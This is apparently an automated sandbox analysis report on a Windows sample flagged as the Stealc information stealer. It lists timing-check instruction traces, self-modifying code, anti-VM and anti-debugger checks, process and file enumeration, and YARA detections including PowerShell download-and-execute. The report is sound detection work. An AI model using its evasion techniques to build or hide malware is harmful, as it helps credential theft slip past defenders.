                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6514 second address: CE6519 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE665F second address: CE666C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41D25BAC6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE666C second address: CE6689 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1048h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE70F8 second address: CE70FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE70FF second address: CE7112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FC41CBA1052h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE7112 second address: CE7116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED048 second address: CED04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECBC8 second address: CECBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECBD1 second address: CECBDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC41CBA1036h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECBDE second address: CECBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD09 second address: CECD23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CBA1036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jne 00007FC41CBA1036h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD23 second address: CECD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BAD5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD3C second address: CECD5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1047h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD5B second address: CECD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD5F second address: CECD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD63 second address: CECD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD6E second address: CECD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CECD74 second address: CECD7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF72FB second address: CF7329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CBA1046h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f push esi 0x00000010 je 00007FC41CBA1036h 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF7329 second address: CF732D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0ADD4 second address: D0ADED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1043h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0ADED second address: D0ADF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0ADF1 second address: D0AE24 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FC41CBA1038h 0x0000000f jc 00007FC41CBA1038h 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007FC41CBA1047h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0AE24 second address: D0AE2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AABF second address: D1AAD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC41CBA1036h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007FC41CBA1036h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AAD2 second address: D1AADD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007FC41D25BAC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AADD second address: D1AAFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FC41CBA1041h 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FC41CBA1036h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AAFE second address: D1AB1D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D25BAC6h 0x00000008 jmp 00007FC41D25BACEh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AC80 second address: D1AC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1AC86 second address: D1AC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1B0FF second address: D1B10C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC41CBA1038h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1CDF8 second address: D1CE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41D25BACDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1CE0E second address: D1CE18 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC41CBA1036h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F7D8 second address: D1F7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FC41D25BAC6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F97A second address: D1F993 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC41CBA1041h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F993 second address: D1F997 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1FD24 second address: D1FD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1FD28 second address: D1FD2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D20FC9 second address: D20FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CF6E second address: C0CF78 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC41D25BAC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22785 second address: D227A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CBA1049h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D227A4 second address: D227E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FC41D25BADCh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FC41D25BAD2h 0x00000017 jg 00007FC41D25BAC6h 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D227E8 second address: D227F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 js 00007FC41CBA105Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D227F8 second address: D22802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC41D25BAC6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420507 second address: 5420524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CBA1049h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420524 second address: 542052A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542052A second address: 542052E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542052E second address: 5420532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420532 second address: 5420587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FC41CBA103Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007FC41CBA1047h 0x0000001b sbb ch, 0000000Eh 0x0000001e jmp 00007FC41CBA1049h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420587 second address: 542058D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542058D second address: 5420591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205AD second address: 54205B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205B1 second address: 54205B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54205B7 second address: 5420610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41D25BAD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC41D25BACCh 0x00000011 sbb al, 00000018h 0x00000014 jmp 00007FC41D25BACBh 0x00000019 popfd 0x0000001a mov edx, ecx 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007FC41D25BAD5h 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420610 second address: 5420666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FC41CBA1046h 0x0000000b add ecx, 6DFF16D8h 0x00000011 jmp 00007FC41CBA103Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FC41CBA1046h 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FC41CBA103Ah 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420666 second address: 542066A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542066A second address: 5420670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9DA66 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: A9D98B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C5E763 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: CC18A6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-38684
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007C40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_007BE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007B1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007C47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007C4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007C3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_007BDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_007BBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_007BEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007BDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007BDF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B1160 GetSystemInfo,ExitProcess,0_2_007B1160
                Source: file.exe, file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareE
                Source: file.exe, 00000000.00000002.1319415153.00000000016B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWQrU
                Source: file.exe, 00000000.00000002.1319415153.00000000016B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1319415153.0000000001682000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37516
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37499
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37496
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37511
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37551
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37385
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007B4610 VirtualProtect ?,00000004,00000100,000000000_2_007B4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007C9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9AA0 mov eax, dword ptr fs:[00000030h]0_2_007C9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_007C7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007C9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_007C98E0
                Source: file.exe, file.exe, 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: #Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F75A8 cpuid 0_2_007F75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_007C7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C7B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_007C7B10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_007C79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007C7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_007C7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.7b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.1261156514.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1319415153.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5456, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
